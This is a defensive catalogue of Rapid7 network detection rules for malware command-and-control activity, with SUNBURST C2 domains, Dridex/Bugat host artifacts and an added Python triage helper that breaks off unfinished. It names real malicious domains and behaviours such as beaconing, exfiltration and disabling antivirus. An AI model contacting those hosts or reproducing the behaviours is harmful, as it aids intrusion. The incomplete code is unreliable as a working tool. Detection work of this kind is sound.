ET MALWARE Dark Halo/SUNBURST CnC Domain (globalnetworkissues .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (kubecloud .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (lcomputers .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (seobundlekit .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (solartrackingsystem .net in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (webcodez .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (globalnetworkissues .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (kubecloud .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (lcomputers .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (seobundlekit .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (solartrackingsystem .net)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (webcodez .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DarkHotel Downloader CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DarkHotel Downloader CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DarkHotel Initial Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DarkHotel Payload Uploading to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Darkness DDoS Bot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Nexus IoT Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Databack CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DATA-BROKER BOT Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Datoploader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Datoploader Activity M2 (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRAT Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity M11

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity M12

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity M13

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat Initial CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ddex Loader Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDG Botnet CnC Job Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDG Botnet CnC Slave POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDG Botnet Miner Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDoS.XOR Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDoS.XOR Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDoS.XOR Checkin via HTTP

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DeathStalker/Janicab CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DeathStalker/Powersing CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DecebalPOS User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DecryptmyFiles Ransomware CnC (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE DEEP PANDA Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DEEP PANDA Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DEEP PANDA Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Delf Checkin via HTTP (5)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Delphi Trojan Downloader User-Agent (JEDI-VCL)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dialer-715 Install Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dialer.MC(vf) HTTP Request - Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dialer.Trojan Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DiamondFox HTTP Post CnC Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Ext Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Ignore Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Key Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Landing Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Priority Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Register M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Register M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Services Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Wipe Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DirectsX CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DirtJumper Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DistTrack/Shamoon CnC Beacon M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DistTrack/Shamoon CnC Beacon M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DLoader File Download Request Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DMSpammer HTTP Post Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSpionage Commands Embedded in Webpage Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSpionage Requesting Config

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSTrojan FakeAV Dropper Activity Observed (1)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSTrojan FakeAV Dropper Activity Observed (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Domen SocEng Redirect - Landing Page Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonBot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Donkeyp2p Update Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Donot (APT-C-35) Stage 1 Requesting Main Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Donot (APT-C-35) Stage 1 Requesting Persistence Setup File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Pult Downloader Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Template Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dooptroop CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dooptroop Dropper Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dorkbot GeoIP Lookup to wipmania

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dorkbot Loader Payload Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dosenjo/Kvadr Proxy Trojan Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downadup/Conficker A or B Worm reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downeks Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downeks Variant CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Downloaded .bat Disables Real Time Monitoring

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloaded .bat Disables Windows Defender

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloaded Script Disables Firewall/Antivirus

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Banload2.KZU Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Banload2.KZU Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DownloaderExchanger/Cbeplay Variant Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader General Bot Checking In via HTTP Post (bot_id push)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader (P2P Zeus dropper UA)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.VB.TX/Backdoor.Win32.DSSdoor!IK Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Adload (KaiXin Payload) Config Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Banload Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Geral Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader Win32.Small.agoy Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Small CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dragonfly Backdoor.Goodor Go Implant CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dridex Base64 Executable

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex/Bugat/Feodo GET Checkin

Description

Bugat, which is also called ‘Cridex’ or ‘Feodo’, is a Trojan designed to intercept information entered by a user on specific websites. This Trojan is commonly used to steal credit card information or credentials for banking websites.

Recommendation

Bugat writes an executable file to disk in the user’s Application Data directory. The standard naming convention for these executable files is a string of eight hexadecimal characters, or the prefix ‘kb’ followed by a string of digits.

Examples: C:\Users\<username>\Application Data\kb208351.exe and C:\Users\<username>\Application Data\3a83cd09.exe. On Windows Vista and later, Application Data under a user profile is a compatibility junction that resolves to C:\Users\<username>\AppData\Roaming, so the same files will appear under that path.

Bugat also creates a value under the HKCU Run key so that the executable is launched at each logon.

When performing investigations, check for executable files matching the location and naming convention above, and review every value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run; validate what each one launches, and remove the entries and files that belong to the malware.

ET MALWARE Dridex/Bugat/Feodo POST Checkin

Description

Bugat, which is also called ‘Cridex’ or ‘Feodo’, is a Trojan designed to intercept information entered by a user on specific websites. This Trojan is commonly used to steal credit card information or credentials for banking websites.

Recommendation

Bugat writes an executable file to disk in the user’s Application Data directory. The standard naming convention for these executable files is a string of eight hexadecimal characters, or the prefix ‘kb’ followed by a string of digits.

Examples: C:\Users\<username>\Application Data\kb208351.exe and C:\Users\<username>\Application Data\3a83cd09.exe. On Windows Vista and later, Application Data under a user profile is a compatibility junction that resolves to C:\Users\<username>\AppData\Roaming, so the same files will appear under that path.

Bugat also creates a value under the HKCU Run key so that the executable is launched at each logon.

When performing investigations, check for executable files matching the location and naming convention above, and review every value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run; validate what each one launches, and remove the entries and files that belong to the malware.
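As an added example (not part of the Rapid7 documentation or of any Rapid7 tooling), the check described in the two Bugat entries above (GET Checkin and POST Checkin), written as Python logic that runs offline against constructed samples: it flags executables sitting directly in a user's Application Data directory whose names follow the eight-hex-character or kb-plus-digits convention, and Run-key values that launch such a file. The sample file list and Run values are constructed for this example; treating AppData\Roaming as equivalent to Application Data, and the simple command-line parser for Run values, are assumptions added here. On a live host you would feed it a directory listing of each user profile and an export of the HKCU Run key.

```python
"""Triage helper for the Bugat/Cridex/Feodo host artifacts described above.

Added example, not Rapid7 code. Two checks from the recommendation:
  1. executables directly under a user's Application Data directory whose
     names are eight hex characters or 'kb' followed by digits;
  2. HKCU Run values whose command line launches such a file.
Inputs are plain strings so the logic can be exercised without Windows.
"""
import re
from ntpath import basename  # Windows path semantics regardless of host OS

# Naming convention from the recommendation: 8 hex chars or kb<digits>, .exe
BUGAT_NAME_RE = re.compile(r"^(?:[0-9a-f]{8}|kb\d+)\.exe$", re.IGNORECASE)

# Assumption added here: "Application Data" is the XP-era name and, on
# Vista and later, a junction to AppData\Roaming, so accept either spelling.
# The file must sit directly in that directory (no further subdirectories).
APPDATA_DIR_RE = re.compile(
    r"^[a-z]:\\(?:users|documents and settings)\\[^\\]+\\"
    r"(?:application data|appdata\\roaming)\\[^\\]+$",
    re.IGNORECASE,
)


def is_bugat_style_path(path: str) -> bool:
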